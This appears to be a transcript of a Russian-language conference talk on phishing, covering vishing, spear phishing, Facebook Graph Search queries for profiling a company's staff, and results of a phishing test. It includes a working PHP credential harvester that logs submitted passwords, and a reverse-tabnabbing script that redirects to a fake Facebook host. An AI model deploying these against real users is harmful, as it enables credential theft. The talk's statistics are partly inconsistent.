Фишинг (Стекольников Илья)
24
-
Upload
kristina-pomozova -
Category
Data & Analytics
-
view
39 -
download
0
Transcript of Фишинг (Стекольников Илья)
[~]$ whoami
Стекольников Илья
Место работы:
Опыт: с 2006 года
Фишинг
(англ. phishing, от fishing — рыбная ловля, выуживание) — вид интернет-мошенничества, целью которого является получение доступа к конфиденциальным данным пользователей — логинам и паролям или иной представляющей интерес информации используя принципысоциальной инженерии.
Фишинг: Vishing
Вишинг(vishing — voice phishing)
Фишинг : Spear phishingНаправленный Фишинг
• Социальная инженерия• OSINT (Open source intelligence)• Телефон, email, sms• Технические средства
Методы и средства:
Методы и средства:
Методы и средства:
Методы и средства:
Facebook Graph Search :
• People who work at %EMPLOYER%
• Comments by %USERNAME% from Almaty
• Posts liked by %USERNAME% at 2016
• Posts liked by People who work at %EMPLOYER%
• People who are younger than 50 and older than 40 and work at %EMPLOYER%
Примеры поисковых запросов:
Методы и средства:
Social Engineering :
• НЛП
• Неоднократные обращения
• Обычные письма содержащие интересные для сотрудника данные
• Обратная социальная инженерия
• Физический доступ
Social Engineering :
• НЛП
• Неоднократные обращения
• Обычные письма содержащие интересные для сотрудника данные
• Обратная социальная инженерия
• Физический доступ
Пример:
Как было сделано. Простая реализация
Как было сделано. Простая реализация
Как было сделано. s.php
<?$Login = $_POST[acc];$Pass = $_POST['pass'];$log = fopen("log.php","a+");fwrite($log,"<br> $Login:$Pass \n");fclose($log);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=https://drive.google.com/file/d/0B0ipfHYtZ3M/view?usp=sharing'></head></html>";
?>
Еще вариант:target="_blank” (в новом окне)
Еще кое-что:target="_blank”
Еще кое-что:
target="_blank”
Как это работает: target="_blank”<a href=“http://defconkz.tk” target="_blank">В новом окне</a>
<script>
window.opener.location = 'http://FAKE_FACEBOOK.tk/f.html';
</script>
Статистика:ИТОГО: • 50% пользователей ввели учетные данные
• 70% пользователей так или иначе выдали конфиденциальную информацию
• 10% пользователей предоставили доступ к ПК через интернет
• Физический доступ в помещение
Выводы:
ИТОГО:
• 5 из 10 пользователей ввели учетные данные
• 7 из 10 пользователей так или иначе выдали конфиденциальную информацию
• 2 из 10 пользователей предоставили доступ к ПК через интернет
• Физический доступ в помещение
ВЫВОДЫ:
Social engineering: Because there is NO PATCH for human stupidity.
